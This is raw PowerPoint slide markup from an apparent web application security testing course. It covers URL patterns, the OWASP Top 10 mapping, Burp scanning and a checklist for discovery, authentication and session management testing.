          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="108857" y="1611087"/>
            <a:ext cx="11985171" cy="4952999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Architectural Pattern did the development team use?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>index?action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addtocart&amp;item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addtocart?Item</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stie.com/item/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addtocart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Site.com/#/Item/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addtocart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/11</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135684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867400" y="70077"/>
            <a:ext cx="4724400" cy="715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mapping from 2013 to 2017 Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D291D94-731F-426E-A7F6-12F655CEEA34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114426" y="1447707"/>
            <a:ext cx="9262528" cy="5038238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="279216875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3F580-6F65-41C9-8BAB-D2E77A75675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19D9D65-A5F7-4A5A-899E-6BF24237A578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="10972800" cy="4790767"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Burp – automated scanner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Crawling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0B684B6-7B31-4597-8E44-5F416AD98DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6069424" y="792163"/>
            <a:ext cx="6055458" cy="5989638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D61523A-66CB-4829-986F-C350117CBE6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3577392"/>
            <a:ext cx="5242540" cy="3008992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14907610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A9EA7-B25C-401D-9502-F845A2115E5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5F288C00-DE29-4621-943A-062740439DCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="10972800" cy="5012355"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sensitive Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business Logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denial-of-service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9583B2A1-A774-43CA-B9D1-410D4B868315}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9939690" y="720248"/>
            <a:ext cx="2252310" cy="2867850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAD1860B-B728-4C5A-80B6-5D4DB197CA81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7550164" y="3588098"/>
            <a:ext cx="2389526" cy="3137267"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21975505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71F4D-AF75-423A-8C22-07454FD96773}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07A60956-EC03-409A-8046-17745B1774D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419100" y="1600201"/>
            <a:ext cx="11163300" cy="4991099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manually explore the site Spider </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for files that expose content </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the caches of major search engines for publicly accessible sites </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for differences in content based on User Agent  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform Web Application Fingerprinting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify technologies used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify user roles </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify application entry points </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify client-side code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify multiple versions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify co-hosted and related applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify all hostnames and ports </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify third-party hosted content </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="698178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B1AEE-F27D-4964-9FF7-43A85E29882A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Configuration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAA431B7-90D8-451C-B95B-1DA715C17055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="10972800" cy="5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for commonly used application and administrative URLs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for old </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check HTTP methods supported and Cross Site Tracing  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test file extensions handling </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for security HTTP headers  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for policies  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for non-production data in live environment </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for sensitive data in client-side code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Risky Functionality - File Uploads  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that acceptable file types are whitelisted </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that file size limits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that file contents match the defined file type </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that all file uploads have Anti-Virus scanning in-place </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that unsafe filenames are sanitized </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that uploaded files are not directly accessible within the web root </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that uploaded files are not served on the same hostname </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test that files and other media are integrated with the authentication and authorization schemas </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19700505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5006A-9835-4C8D-8559-5DD3D9A643DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCB3D4DF-70B8-4583-BFC6-901E1956F9C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352425" y="1600201"/>
            <a:ext cx="11229975" cy="5181599"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for user enumeration </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for authentication bypass </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for brute force protection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test password quality rules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test remember me functionality </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for autocomplete on password forms </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test password reset and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test password change process </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test CAPTCHA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test multi factor authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for logout functionality presence </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for cache management on HTTP  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for default logins </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for user-accessible authentication history </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>out-of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> channel notification of account lockouts and successful password changes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for consistent authentication across applications with shared authentication schema </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26444620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639A-7310-4F34-B495-39971BCD5E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Session Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{279ECDA6-83F5-4B85-B4A6-5AFF60E5C39B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="276225" y="1600201"/>
            <a:ext cx="11306175" cy="5010149"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Establish how session management is handled in the application  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session tokens for cookie flags  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session cookie scope  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session cookie duration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session termination after a maximum lifetime </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session termination after relative timeout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session termination after logout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test to see if users can have multiple simultaneous sessions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test session cookies for randomness </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confirm that new session tokens are issued on login </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for consistent session management across applications with shared session management </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for session puzzling </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for CSRF and clickjacking </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32496689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28E91-F5C9-4F27-A406-968FA0E9642E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
